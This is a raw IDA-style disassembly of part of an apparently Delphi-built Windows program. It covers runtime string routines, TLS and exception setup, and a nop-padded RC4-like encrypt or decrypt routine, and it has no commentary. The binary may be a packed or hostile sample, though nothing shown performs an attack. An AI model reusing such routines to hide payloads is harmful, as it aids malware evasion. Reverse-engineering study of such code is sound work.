add eax, 0Ah
and eax, 0FFFFFFFEh
push eax
call sub_4027B4
pop edx
mov word ptr [edx+eax-2], 0
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
retn
; ---------------------------------------------------------------------------
loc_403620: ; CODE XREF: sub_4035F8+2�j
xor eax, eax
retn
sub_4035F8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403624 proc near ; CODE XREF: sub_402A6C+30�p
; sub_403654+8�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_4035F8
mov ecx, edi
mov edi, eax
test esi, esi
jz short loc_403645
mov edx, eax
mov eax, esi
call sub_4028C8
loc_403645: ; CODE XREF: sub_403624+16�j
mov eax, ebx
call sub_403560
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_403624 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403654 proc near ; CODE XREF: sub_4040B4+90�p
push edx
mov edx, esp
mov ecx, 1
call sub_403624
pop edx
retn
sub_403654 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403664 proc near ; CODE XREF: sub_4045CC+28�p
; sub_404D90+28�p
xor ecx, ecx
mov cl, [edx]
inc edx
jmp sub_403624
sub_403664 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403670 proc near ; CODE XREF: sub_4039B0+36�p
; sub_404E50+2B�p
push edi
push eax
push ecx
mov edi, edx
xor eax, eax
repne scasb
jnz short loc_40367D
not ecx
loc_40367D: ; CODE XREF: sub_403670+9�j
pop eax
add ecx, eax
pop eax
pop edi
jmp sub_403624
sub_403670 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403688 proc near ; CODE XREF: sub_403D14+F�p
; sub_403E38+F�p
test eax, eax
jz short locret_40368F
mov eax, [eax-4]
locret_40368F: ; CODE XREF: sub_403688+2�j
retn
sub_403688 endp
; =============== S U B R O U T I N E =======================================
sub_403690 proc near ; CODE XREF: sub_4036D4+1D�j
; sub_4036D4+6E�j ...
test edx, edx
jz short locret_4036D3
mov ecx, [eax]
test ecx, ecx
jz sub_4035B4
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, [ecx-4]
mov edx, [esi-4]
add edx, edi
cmp esi, ecx
jz short loc_4036C8
call sub_403854
mov eax, esi
mov ecx, [esi-4]
loc_4036BB: ; CODE XREF: sub_403690+41�j
mov edx, [ebx]
add edx, edi
call sub_4028C8
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4036C8: ; CODE XREF: sub_403690+1F�j
call sub_403854
mov eax, [ebx]
mov ecx, edi
jmp short loc_4036BB
; ---------------------------------------------------------------------------
locret_4036D3: ; CODE XREF: sub_403690+2�j
retn
sub_403690 endp
; =============== S U B R O U T I N E =======================================
sub_4036D4 proc near ; CODE XREF: CODE:00405337�p
test edx, edx
jz short loc_403739
test ecx, ecx
jz sub_4035B4
cmp edx, [eax]
jz short loc_403740
cmp ecx, [eax]
jz short loc_4036F6
push eax
push ecx
call sub_4035B4
pop edx
pop eax
jmp sub_403690
; ---------------------------------------------------------------------------
loc_4036F6: ; CODE XREF: sub_4036D4+12�j
push ebx
push esi
push edi
mov ebx, edx
mov esi, ecx
push eax
mov eax, [ebx-4]
add eax, [esi-4]
call sub_4035F8
mov edi, eax
mov edx, eax
mov eax, ebx
mov ecx, [ebx-4]
call sub_4028C8
mov edx, edi
mov eax, esi
mov ecx, [esi-4]
add edx, [ebx-4]
call sub_4028C8
pop eax
mov edx, edi
test edi, edi
jz short loc_403730
dec dword ptr [edi-8]
loc_403730: ; CODE XREF: sub_4036D4+57�j
call sub_4035B4
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403739: ; CODE XREF: sub_4036D4+2�j
mov edx, ecx
jmp sub_4035B4
; ---------------------------------------------------------------------------
loc_403740: ; CODE XREF: sub_4036D4+E�j
mov edx, ecx
jmp sub_403690
sub_4036D4 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403748 proc near ; CODE XREF: sub_404E94+3C�p
; sub_404E94+65�p ...
push ebx
push esi
push edi
mov esi, eax
mov edi, edx
cmp eax, edx
jz loc_4037E6
test esi, esi
jz short loc_4037C3
test edi, edi
jz short loc_4037CA
mov eax, [esi-4]
mov edx, [edi-4]
sub eax, edx
ja short loc_40376B
add edx, eax
loc_40376B: ; CODE XREF: sub_403748+1F�j
push edx
shr edx, 2
jz short loc_403797
loc_403771: ; CODE XREF: sub_403748+45�j
mov ecx, [esi]
mov ebx, [edi]
cmp ecx, ebx
jnz short loc_4037D1
dec edx
jz short loc_403791
mov ecx, [esi+4]
mov ebx, [edi+4]
cmp ecx, ebx
jnz short loc_4037D1
add esi, 8
add edi, 8
dec edx
jnz short loc_403771
jmp short loc_403797
; ---------------------------------------------------------------------------
loc_403791: ; CODE XREF: sub_403748+32�j
add esi, 4
add edi, 4
loc_403797: ; CODE XREF: sub_403748+27�j
; sub_403748+47�j
pop edx
and edx, 3
jz short loc_4037BF
mov ecx, [esi]
mov ebx, [edi]
cmp cl, bl
jnz short loc_4037E6
dec edx
jz short loc_4037BF
cmp ch, bh
jnz short loc_4037E6
dec edx
jz short loc_4037BF
and ebx, 0FF0000h
and ecx, 0FF0000h
cmp ecx, ebx
jnz short loc_4037E6
loc_4037BF: ; CODE XREF: sub_403748+53�j
; sub_403748+5E�j ...
add eax, eax
jmp short loc_4037E6
; ---------------------------------------------------------------------------
loc_4037C3: ; CODE XREF: sub_403748+11�j
mov edx, [edi-4]
sub eax, edx
jmp short loc_4037E6
; ---------------------------------------------------------------------------
loc_4037CA: ; CODE XREF: sub_403748+15�j
mov eax, [esi-4]
sub eax, edx
jmp short loc_4037E6
; ---------------------------------------------------------------------------
loc_4037D1: ; CODE XREF: sub_403748+2F�j
; sub_403748+3C�j
pop edx
cmp cl, bl
jnz short loc_4037E6
cmp ch, bh
jnz short loc_4037E6
shr ecx, 10h
shr ebx, 10h
cmp cl, bl
jnz short loc_4037E6
cmp ch, bh
loc_4037E6: ; CODE XREF: sub_403748+9�j
; sub_403748+5B�j ...
pop edi
pop esi
pop ebx
retn
sub_403748 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4037EC proc near ; CODE XREF: sub_403F24+17�p
; sub_4040B4+14�p ...
test eax, eax
jz short locret_4037FA
mov edx, [eax-8]
inc edx
jle short locret_4037FA
lock inc dword ptr [eax-8]
locret_4037FA: ; CODE XREF: sub_4037EC+2�j
; sub_4037EC+8�j
retn
sub_4037EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4037FC proc near ; CODE XREF: sub_403E38+2A�p
; sub_403F24+7D�p ...
test eax, eax
jz short loc_403802
retn
; ---------------------------------------------------------------------------
byte_403801 db 0 ; DATA XREF: sub_4037FC:loc_403802�o
; ---------------------------------------------------------------------------
loc_403802: ; CODE XREF: sub_4037FC+2�j
mov eax, offset byte_403801
retn
sub_4037FC endp
; =============== S U B R O U T I N E =======================================
sub_403808 proc near ; CODE XREF: sub_40384C�j
mov edx, [eax]
test edx, edx
jz short loc_403846
mov ecx, [edx-8]
dec ecx
jz short loc_403846
push ebx
mov ebx, eax
mov eax, [edx-4]
call sub_4035F8
mov edx, eax
mov eax, [ebx]
mov [ebx], edx
push eax
mov ecx, [eax-4]
call sub_4028C8
pop eax
mov ecx, [eax-8]
dec ecx
jl short loc_403843
lock dec dword ptr [eax-8]
jnz short loc_403843
lea eax, [eax-8]
call sub_4027E4
loc_403843: ; CODE XREF: sub_403808+2B�j
; sub_403808+31�j
mov edx, [ebx]
pop ebx
loc_403846: ; CODE XREF: sub_403808+4�j
; sub_403808+A�j
mov eax, edx
retn
sub_403808 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40384C proc near ; CODE XREF: sub_403E38+22�p
; sub_403F24+40�p ...
jmp sub_403808
sub_40384C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403854 proc near ; CODE XREF: sub_402908+B3�p
; sub_403690+21�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
xor edi, edi
test edx, edx
jle short loc_4038A9
mov eax, [ebx]
test eax, eax
jz short loc_40388A
cmp dword ptr [eax-8], 1
jnz short loc_40388A
sub eax, 8
add edx, 9
push eax
mov eax, esp
call sub_402804
pop eax
add eax, 8
mov [ebx], eax
mov [eax-4], esi
mov byte ptr [esi+eax], 0
jmp short loc_4038B2
; ---------------------------------------------------------------------------
loc_40388A: ; CODE XREF: sub_403854+11�j
; sub_403854+17�j
mov eax, edx
call sub_4035F8
mov edi, eax
mov eax, [ebx]
test eax, eax
jz short loc_4038A9
mov edx, edi
mov ecx, [eax-4]
cmp ecx, esi
jl short loc_4038A4
mov ecx, esi
loc_4038A4: ; CODE XREF: sub_403854+4C�j
call sub_4028C8
loc_4038A9: ; CODE XREF: sub_403854+B�j
; sub_403854+43�j
mov eax, ebx
call sub_403560
mov [ebx], edi
loc_4038B2: ; CODE XREF: sub_403854+34�j
pop edi
pop esi
pop ebx
retn
sub_403854 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4038B8 proc near ; DATA XREF: sub_403A78+2F�o
; BSS:off_407000�o
mov al, 11h
jmp sub_4028AC
sub_4038B8 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038C0 proc near ; CODE XREF: sub_40392C+1D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, ds:dword_406020
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_403913
loc_4038DA: ; CODE XREF: sub_4038C0+51�j
xor eax, eax
push ebp
push offset loc_4038FB
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, [ebp+var_8]
mov eax, [ebp+var_4]
call dword ptr [ebx+4]
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_403905
; ---------------------------------------------------------------------------
loc_4038FB: ; DATA XREF: sub_4038C0+1D�o
jmp loc_402EA8
; ---------------------------------------------------------------------------
call sub_403060
loc_403905: ; CODE XREF: sub_4038C0+39�j
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4038DA
loc_403913: ; CODE XREF: sub_4038C0+18�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_4038C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40391C proc near ; CODE XREF: sub_403C04+5�p
mov edx, ds:dword_40601C
mov [eax], edx
mov ds:dword_40601C, eax
retn
sub_40391C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40392C proc near ; CODE XREF: sub_403468+76�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_4039A5
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
mov eax, [eax+4]
call sub_4038C0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4039AC
loc_40395B: ; CODE XREF: sub_40392C+7E�j
mov eax, [ebp+var_4]
cmp eax, ds:dword_40601C
jnz short loc_403972
mov eax, [ebp+var_4]
mov eax, [eax]
mov ds:dword_40601C, eax
jmp short loc_4039A4
; ---------------------------------------------------------------------------
loc_403972: ; CODE XREF: sub_40392C+38�j
mov eax, ds:dword_40601C
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4039A4
loc_403980: ; CODE XREF: sub_40392C+76�j
mov eax, [ebp+var_8]
mov eax, [eax]
cmp eax, [ebp+var_4]
jnz short loc_403996
mov eax, [ebp+var_4]
mov eax, [eax]
mov edx, [ebp+var_8]
mov [edx], eax
jmp short loc_4039A4
; ---------------------------------------------------------------------------
loc_403996: ; CODE XREF: sub_40392C+5C�j
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_403980
loc_4039A4: ; CODE XREF: sub_40392C+44�j
; sub_40392C+52�j ...
retn
; ---------------------------------------------------------------------------
loc_4039A5: ; DATA XREF: sub_40392C+C�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_40395B
; ---------------------------------------------------------------------------
loc_4039AC: ; CODE XREF: sub_40392C:loc_4039A4�j
; DATA XREF: sub_40392C+2A�o
pop ecx
pop ecx
pop ebp
retn
sub_40392C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039B0 proc near ; CODE XREF: sub_403A78+AD�p
; sub_403A78+BE�p
var_10 = dword ptr -10h
var_B = byte ptr -0Bh
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
xor edx, edx
mov [ebp+var_10], edx
xor edx, edx
push ebp
push offset loc_403A16
push dword ptr fs:[edx]
mov fs:[edx], esp
push 7
lea edx, [ebp+var_B]
push edx
push 1004h
push eax
call sub_401050 ; GetLocaleInfoA
lea eax, [ebp+var_10]
lea edx, [ebp+var_B]
mov ecx, 7
call sub_403670
mov eax, [ebp+var_10]
lea edx, [ebp+var_4]
call sub_402BD0
mov ebx, eax
cmp [ebp+var_4], 0
jz short loc_403A00
xor ebx, ebx
loc_403A00: ; CODE XREF: sub_4039B0+4C�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403A1D
loc_403A0D: ; CODE XREF: sub_4039B0+6B�j
lea eax, [ebp+var_10]
call sub_403560
retn
; ---------------------------------------------------------------------------
loc_403A16: ; DATA XREF: sub_4039B0+F�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_403A1D: ; CODE XREF: sub_4039B0+65�j
; DATA XREF: sub_4039B0+58�o
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn
sub_4039B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A24 proc near ; DATA XREF: CODE:00405274�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403A6E
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4075A4
jnz short loc_403A60
mov eax, offset dword_407038
call sub_402AD0
mov eax, offset dword_407204
call sub_402AD0
mov eax, offset dword_4073D0
call sub_402AD0
call sub_4019DC
loc_403A60: ; CODE XREF: sub_403A24+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403A75
loc_403A6D: ; CODE XREF: sub_403A24+4F�j
retn
; ---------------------------------------------------------------------------
loc_403A6E: ; DATA XREF: sub_403A24+6�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_403A6D
; ---------------------------------------------------------------------------
loc_403A75: ; CODE XREF: sub_403A24:loc_403A6D�j
; DATA XREF: sub_403A24+44�o
pop ebp
retn
sub_403A24 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403A78 proc near ; DATA XREF: CODE:00405270�o
sub ds:dword_4075A4, 1
jnb locret_403B4A
mov ds:byte_406008, 2
mov ds:off_407010, offset sub_401008
mov ds:off_407014, offset sub_401010
mov ds:byte_407036, 2
mov ds:off_407000, offset sub_4038B8
call sub_402CAC
test al, al
jz short loc_403ABF
call sub_402CDC
loc_403ABF: ; CODE XREF: sub_403A78+40�j
call sub_402DA0
mov ds:word_40703C, 0D7B0h
mov ds:word_407208, 0D7B0h
mov ds:word_4073D4, 0D7B0h
call sub_401048 ; GetCommandLineA
mov ds:dword_40702C, eax
call sub_401098
mov ds:dword_407028, eax
call sub_401090 ; GetVersion
and eax, 80000000h
cmp eax, 80000000h
jz short loc_403B31
call sub_401090 ; GetVersion
and eax, 0FFh
cmp ax, 4
jbe short loc_403B20
mov ds:dword_4075A8, 3
jmp short loc_403B40
; ---------------------------------------------------------------------------
loc_403B20: ; CODE XREF: sub_403A78+9A�j
call sub_401068 ; GetThreadLocale
call sub_4039B0
mov ds:dword_4075A8, eax
jmp short loc_403B40
; ---------------------------------------------------------------------------
loc_403B31: ; CODE XREF: sub_403A78+8A�j
call sub_401068 ; GetThreadLocale
call sub_4039B0
mov ds:dword_4075A8, eax
loc_403B40: ; CODE XREF: sub_403A78+A6�j
; sub_403A78+B7�j
call sub_401088 ; GetCurrentThreadId
mov ds:dword_407020, eax
locret_403B4A: ; CODE XREF: sub_403A78+7�j
retn
sub_403A78 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403B4C proc near ; CODE XREF: sub_403C10+C�p
jmp ds:dword_408114
sub_403B4C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403B54 proc near ; CODE XREF: sub_403B6C+3�p
jmp ds:dword_408110
sub_403B54 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403B5C proc near ; CODE XREF: sub_403BC4+25�p
; sub_403BC4+36�p
jmp ds:dword_40810C
sub_403B5C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403B64 proc near ; CODE XREF: sub_403B80+3D�p
jmp ds:dword_408108
sub_403B64 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403B6C proc near ; CODE XREF: sub_403B80+21�p
push eax
push 40h
call sub_403B54 ; LocalAlloc
retn
sub_403B6C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403B78 proc near ; CODE XREF: sub_403B80+1�p
mov eax, 8
retn
sub_403B78 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403B80 proc near ; CODE XREF: sub_403BC4:loc_403BDE�p
push ebx
call sub_403B78
mov ebx, eax
test ebx, ebx
jz short loc_403BC2
cmp ds:TlsIndex, 0FFFFFFFFh
jnz short loc_403B9F
mov eax, 0E2h
call sub_403554
; ---------------------------------------------------------------------------
loc_403B9F: ; CODE XREF: sub_403B80+13�j
mov eax, ebx
call sub_403B6C
test eax, eax
jnz short loc_403BB6
mov eax, 0E2h
call sub_403554
; ---------------------------------------------------------------------------
jmp short loc_403BC2
; ---------------------------------------------------------------------------
loc_403BB6: ; CODE XREF: sub_403B80+28�j
push eax
mov eax, ds:TlsIndex
push eax
call sub_403B64 ; TlsSetValue
loc_403BC2: ; CODE XREF: sub_403B80+A�j
; sub_403B80+34�j
pop ebx
retn
sub_403B80 endp
; =============== S U B R O U T I N E =======================================
sub_403BC4 proc near ; CODE XREF: sub_402860+20�p
; sub_4028B8+3�p ...
mov cl, ds:byte_40764C
mov eax, ds:TlsIndex
test cl, cl
jnz short loc_403BF9
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_403BDE: ; CODE XREF: sub_403BC4+3D�j
call sub_403B80
mov eax, ds:TlsIndex
push eax
call sub_403B5C ; TlsGetValue
test eax, eax
jz short loc_403BF3
retn
; ---------------------------------------------------------------------------
loc_403BF3: ; CODE XREF: sub_403BC4+2C�j
mov eax, ds:dword_407658
retn
; ---------------------------------------------------------------------------
loc_403BF9: ; CODE XREF: sub_403BC4+D�j
push eax
call sub_403B5C ; TlsGetValue
test eax, eax
jz short loc_403BDE
retn
sub_403BC4 endp
; =============== S U B R O U T I N E =======================================
sub_403C04 proc near ; CODE XREF: sub_403C10+2E�p
mov eax, offset dword_406088
call sub_40391C
retn
sub_403C04 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403C10 proc near ; CODE XREF: CODE:004052C0�p
push ebx
mov ebx, eax
xor eax, eax
mov ds:TlsIndex, eax
push 0
call sub_403B4C ; GetModuleHandleA
mov ds:dword_407650, eax
mov eax, ds:dword_407650
mov ds:dword_40608C, eax
xor eax, eax
mov ds:dword_406090, eax
xor eax, eax
mov ds:dword_406094, eax
call sub_403C04
mov edx, offset dword_406088
mov eax, ebx
call sub_403310
pop ebx
retn
sub_403C10 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C54 proc near ; DATA XREF: CODE:0040526C�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403C79
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_407654
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403C80
loc_403C78: ; CODE XREF: sub_403C54+2A�j
retn
; ---------------------------------------------------------------------------
loc_403C79: ; DATA XREF: sub_403C54+6�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_403C78
; ---------------------------------------------------------------------------
loc_403C80: ; CODE XREF: sub_403C54:loc_403C78�j
; DATA XREF: sub_403C54+1F�o
pop ebp
retn
sub_403C54 endp
; ---------------------------------------------------------------------------
align 4
loc_403C84: ; DATA XREF: CODE:off_405268�o
sub ds:dword_407654, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C8C proc near ; DATA XREF: CODE:0040527C�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403CB1
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_40765C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403CB8
loc_403CB0: ; CODE XREF: sub_403C8C+2A�j
retn
; ---------------------------------------------------------------------------
loc_403CB1: ; DATA XREF: sub_403C8C+6�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_403CB0
; ---------------------------------------------------------------------------
loc_403CB8: ; CODE XREF: sub_403C8C:loc_403CB0�j
; DATA XREF: sub_403C8C+1F�o
pop ebp
retn
sub_403C8C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403CBC proc near ; DATA XREF: CODE:00405278�o
sub ds:dword_40765C, 1
retn
sub_403CBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403CC4 proc near ; CODE XREF: sub_403F24+E7�p
jmp ds:dword_408124
sub_403CC4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403CCC proc near ; CODE XREF: sub_403F24+AE�p
; sub_4041C0+85�p
jmp ds:dword_408120
sub_403CCC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403CD4 proc near ; CODE XREF: sub_403F24+83�p
; sub_4041C0+3F�p ...
jmp ds:dword_40811C
sub_403CD4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CDC proc near ; DATA XREF: CODE:00405284�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403D01
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_407660
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403D08
loc_403D00: ; CODE XREF: sub_403CDC+2A�j
retn
; ---------------------------------------------------------------------------
loc_403D01: ; DATA XREF: sub_403CDC+6�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_403D00
; ---------------------------------------------------------------------------
loc_403D08: ; CODE XREF: sub_403CDC:loc_403D00�j
; DATA XREF: sub_403CDC+1F�o
pop ebp
retn
sub_403CDC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403D0C proc near ; DATA XREF: CODE:00405280�o
sub ds:dword_407660, 1
retn
sub_403D0C endp
; =============== S U B R O U T I N E =======================================
sub_403D14 proc near ; CODE XREF: sub_403E78+18�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov [esp+1Ch+var_1C], edx
mov edi, eax
mov eax, [esp+1Ch+var_1C]
call sub_403688
mov [esp+1Ch+var_14], eax
nop
nop
nop
mov byte ptr [edi+100h], 0
mov byte ptr [edi+101h], 0
xor edx, edx
mov eax, edi
loc_403D41: ; CODE XREF: sub_403D14+33�j
mov [eax], dl
inc edx
inc eax
test dl, dl
jnz short loc_403D41
xor eax, eax
xor esi, esi
mov dl, 0
mov ecx, edi
loc_403D51: ; CODE XREF: sub_403D14+88�j
nop
nop
nop
cmp esi, [esp+1Ch+var_14]
jge short loc_403D66
mov ebx, [esp+1Ch+var_1C]
mov bl, [ebx+esi]
mov [esp+1Ch+var_17], bl
jmp short loc_403D6B
; ---------------------------------------------------------------------------
loc_403D66: ; CODE XREF: sub_403D14+44�j
mov [esp+1Ch+var_17], 0
loc_403D6B: ; CODE XREF: sub_403D14+50�j
inc esi
cmp esi, [esp+1Ch+var_14]
jl short loc_403D74
xor esi, esi
loc_403D74: ; CODE XREF: sub_403D14+5C�j
mov bl, [ecx]
add bl, [esp+1Ch+var_17]
add al, bl
mov bl, [ecx]
mov [esp+1Ch+var_18], bl
xor ebx, ebx
mov bl, al
mov bl, [edi+ebx]
mov [ecx], bl
xor ebx, ebx
mov bl, al
lea ebp, [edi+ebx]
mov bl, [esp+1Ch+var_18]
mov [ebp+0], bl
inc ecx
dec dl
jnz short loc_403D51
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_403D14 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403DA8 proc near ; CODE XREF: sub_403E78+53�p
nop
nop
nop
xor ecx, ecx
mov edx, 102h
call sub_402B44
retn
sub_403DA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DB8 proc near ; CODE XREF: sub_403E38+34�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
nop
nop
nop
mov ebx, [ebp+arg_0]
dec ebx
test ebx, ebx
jl short loc_403E2E
inc ebx
mov [ebp+var_4], ebx
mov esi, edx
loc_403DD0: ; CODE XREF: sub_403DB8+74�j
nop
nop
nop
inc byte ptr [eax+100h]
xor edx, edx
mov dl, [eax+100h]
mov dl, [eax+edx]
add [eax+101h], dl
xor ebx, ebx
mov bl, [eax+101h]
mov bl, [eax+ebx]
push ebx
xor ebx, ebx
mov bl, [eax+100h]
lea edi, [eax+ebx]
pop ebx
mov [edi], bl
xor ebx, ebx
mov bl, [eax+101h]
mov [eax+ebx], dl
xor ebx, ebx
mov bl, [eax+100h]
add dl, [eax+ebx]
and edx, 0FFh
mov dl, [eax+edx]
xor dl, [esi]
mov [ecx], dl
inc ecx
inc esi
dec [ebp+var_4]
jnz short loc_403DD0
loc_403E2E: ; CODE XREF: sub_403DB8+10�j
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 4
sub_403DB8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403E38 proc near ; CODE XREF: sub_403E78+38�p
push ebx
push esi
push edi
push ebp
mov edi, ecx
mov esi, edx
mov ebp, eax
nop
nop
nop
mov eax, esi
call sub_403688
mov ebx, eax
mov eax, edi
mov edx, ebx
call sub_403854
push ebx
mov eax, edi
call sub_40384C
push eax
mov eax, esi
call sub_4037FC
mov edx, eax
mov eax, ebp
pop ecx
call sub_403DB8
pop ebp
pop edi
pop esi
pop ebx
retn
sub_403E38 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E78 proc near ; CODE XREF: sub_403F24+75�p
; sub_403F24+9A�p ...
var_102 = byte ptr -102h
push ebp
mov ebp, esp
add esp, 0FFFFFEFCh
push ebx
push esi
mov esi, ecx
mov ebx, eax
nop
nop
nop
lea eax, [ebp+var_102]
call sub_403D14
xor eax, eax
push ebp
push offset loc_403ED1
push dword ptr fs:[eax]
mov fs:[eax], esp
nop
nop
nop
mov ecx, esi
lea eax, [ebp+var_102]
mov edx, ebx
call sub_403E38
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403ED8
loc_403EC2: ; CODE XREF: sub_403E78+5E�j
nop
nop
nop
lea eax, [ebp+var_102]
call sub_403DA8
retn
; ---------------------------------------------------------------------------
loc_403ED1: ; DATA XREF: sub_403E78+20�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_403EC2
; ---------------------------------------------------------------------------
loc_403ED8: ; DATA XREF: sub_403E78+45�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403E78 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403EE0 proc near ; DATA XREF: CODE:0040528C�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403F05
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_407664
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403F0C
loc_403F04: ; CODE XREF: sub_403EE0+2A�j
retn
; ---------------------------------------------------------------------------
